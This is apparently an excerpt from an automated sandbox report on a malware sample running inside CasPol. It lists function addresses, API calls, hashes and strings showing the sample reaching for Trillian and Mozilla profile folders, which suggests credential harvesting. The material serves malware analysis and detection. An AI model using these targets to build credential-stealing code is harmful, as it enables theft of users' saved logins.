                                                                                                                                                                                    • Opcode ID: 677692d301f0db8cc153d2d8d96151c0f8cb2f2c501c2bf71f0e5a3c8bab21a6
                                                                                                                                                                                    • Instruction ID: 67585355273d4b01a1114a6cd89f6c97ebf6c1cbf8b7b4d496df69d3c229a794
                                                                                                                                                                                    • Opcode Fuzzy Hash: 677692d301f0db8cc153d2d8d96151c0f8cb2f2c501c2bf71f0e5a3c8bab21a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48115E76904118BADF21A792ED06FDE7B7CDF54304F0000B6AA44E1091EB756FD5DA64
                                                                                                                                                                                    Function 0040D4E9 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D516
                                                                                                                                                                                      • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040D52E
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040D53C
                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
                                                                                                                                                                                    • String ID: Mozilla\Profiles
                                                                                                                                                                                    • API String ID: 2008385565-2796945589
                                                                                                                                                                                    • Opcode ID: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
                                                                                                                                                                                    • Instruction ID: 3c6ae931ffe100bc814a6c4c739c4374e257fa1fb59e82d364b3a540d615c615
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2201F07290821466D711A6699C42FCA779C4F21759F2404BBF5C5F31C2EDB899C443A9
                                                                                                                                                                                    Function 0040783B Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 35stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00407930: FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                                                                                                                                                                      • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                                                      • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407862
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040786F
                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$CloseFind_mbscat_mbscpymemcpy
                                                                                                                                                                                    • String ID: *.*$B@
                                                                                                                                                                                    • API String ID: 470300861-2086290067
                                                                                                                                                                                    • Opcode ID: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                                                                                                                                                                    • Instruction ID: 1d68107b6d1fc83258085f2e46244374cde2cc5f318db11bb1f65da7a858b60d
                                                                                                                                                                                    • Opcode Fuzzy Hash: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7F0E972D082166FD200AA66984599BBB9C8F52729F11443FF808B7142D63D6D0643AF
                                                                                                                                                                                    Function 004140F2 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 74d8481262f99670515fecde3c31a13fb89e1ae3c69a9c7826832b912e140cc6
                                                                                                                                                                                    • Instruction ID: 5397eece0a1688dd905253f83ef07836dc4e260be7ec153caf65aeba5f13d1a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74d8481262f99670515fecde3c31a13fb89e1ae3c69a9c7826832b912e140cc6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E04674308210269A24AF3BFE49AC723AC5B54725794852FF808D33A2CE2CCCC0802C